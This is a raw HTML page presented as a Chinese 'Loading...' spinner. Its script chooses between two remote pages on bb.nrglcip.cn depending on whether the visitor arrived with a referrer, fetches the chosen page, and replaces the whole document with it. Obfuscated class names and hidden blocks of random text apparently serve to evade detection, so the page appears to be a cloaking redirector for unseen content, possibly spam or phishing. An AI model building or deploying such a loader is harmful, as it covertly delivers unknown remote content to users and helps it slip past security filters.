<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .y7cxP0KhLv {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .y7cxP0KhLv .G5OxlB {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .y7cxP0KhLv .content {
            line-height: 50px;
            text-align: center
        }

        .y7cxP0KhLv .img {
            width: 100%
        }

        .y7cxP0KhLv .wOvhFa {
            text-align: center
        }

        .y7cxP0KhLv .wOvhFa span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .y7cxP0KhLv .wOvhFa span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .y7cxP0KhLv .wOvhFa span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .y7cxP0KhLv .wOvhFa span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .y7cxP0KhLv .wOvhFa span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .y7cxP0KhLv .wOvhFa span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .y7cxP0KhLv .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function r7k3Qy6tezAv(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var iYV2s = r7k3Qy6tezAv('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ iYV2s +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ iYV2s +".html?a=share";
		}
		
        aSoeE3Fc=url+"#"+new Date().getTime();
        aSoeE3Fc && function() {
            $.get(aSoeE3Fc, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<p  style='display:none'>MnVtHeH5lepd6jKq4V85q</p>
<a  href='#' style='display:none'>vwCJkSMBFnX8R</a>
<img  src='' style='display:none'>
<li style='display:none' >jkrJ2PNmOHZH</li>
<li style='display:none' >jkrJ2PNmOHZH</li><div class="y7cxP0KhLv">
    <div class="G5OxlB">
        <div class="wOvhFa">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<p  style='display:none'>wTkLLTVwErHWgzKjhbIUsZXIqIfd8zdVzp0XSfI80wzRJCbbax8JSYfOhHc9Qsf</p>
<b style='display:none' >XKAIbJpP5zfeQnZFm1s9wZJfX3Pm9hCFFkcHDzK1HF6IJ</b>
<span style='display:none'>oyTgD5q5tuEfj1lkabZz3xDzbmcB54jHgpcrXglLkstBJLDbdT7zHZ2Acs6lgwC56uXR9mz3EwDlSOp9Z</span></body>
</html>